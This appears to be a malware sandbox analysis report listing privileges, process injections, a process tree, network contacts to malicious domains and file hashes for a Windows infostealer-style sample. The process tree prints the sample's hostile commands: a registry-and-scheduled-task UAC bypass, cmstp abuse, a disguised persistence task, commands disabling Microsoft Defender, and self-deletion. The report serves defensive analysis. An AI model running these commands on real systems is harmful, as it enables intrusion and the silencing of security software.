Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3728 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3728 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3728 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 3172 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2724 wrote to memory of 1392 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 3620 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 212 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
PID 212 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
PID 212 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
PID 212 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
PID 212 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
PID 212 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\cmd.exe
PID 1264 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3620 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\852648917343331\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3620

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

"C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe"

C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe

"C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe"

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

"C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe"

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

"C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe"

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\mobsync.exe

C:\Windows\System32\mobsync.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i2gwbrqy.inf

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

"{path}"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\h3gk1fsv.exe

C:\Windows\temp\h3gk1fsv.exe

C:\Windows\temp\h3gk1fsv.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp

Files

memory/3728-116-0x0000000000680000-0x0000000000681000-memory.dmp

memory/2724-117-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3172-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2724-127-0x00000000004D0000-0x00000000004D1000-memory.dmp

memory/3172-128-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/212-129-0x000000000044003F-mapping.dmp

memory/3728-130-0x0000000003550000-0x0000000003558000-memory.dmp

memory/3620-131-0x0000000000417A8B-mapping.dmp

memory/1392-133-0x000000000041A684-mapping.dmp

memory/212-136-0x00000000005E0000-0x000000000072A000-memory.dmp

memory/212-135-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3620-137-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3620-138-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/1392-139-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1392-140-0x0000000002010000-0x0000000002011000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/3856-150-0x0000000000000000-mapping.dmp

memory/8-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3732-152-0x0000000000000000-mapping.dmp

memory/3524-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/3732-158-0x0000000000200000-0x0000000000201000-memory.dmp

memory/3728-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3728-163-0x0000000000690000-0x0000000000691000-memory.dmp

memory/3524-165-0x00000000004C0000-0x000000000060A000-memory.dmp

memory/3732-166-0x0000000004A40000-0x0000000004AA6000-memory.dmp

memory/3732-167-0x0000000007460000-0x0000000007461000-memory.dmp

memory/3728-168-0x0000000004EC0000-0x0000000004F20000-memory.dmp

memory/1192-170-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/3728-172-0x0000000007510000-0x0000000007511000-memory.dmp

memory/1192-175-0x0000000000E80000-0x0000000000E81000-memory.dmp

memory/1344-178-0x0000000000000000-mapping.dmp

memory/1264-177-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/3728-181-0x0000000007480000-0x0000000007481000-memory.dmp

memory/1192-183-0x0000000005690000-0x00000000056F0000-memory.dmp

memory/3728-184-0x0000000004F50000-0x0000000004F51000-memory.dmp

memory/3732-186-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

memory/1264-188-0x00000000004C0000-0x000000000060A000-memory.dmp

memory/2372-190-0x0000000000000000-mapping.dmp
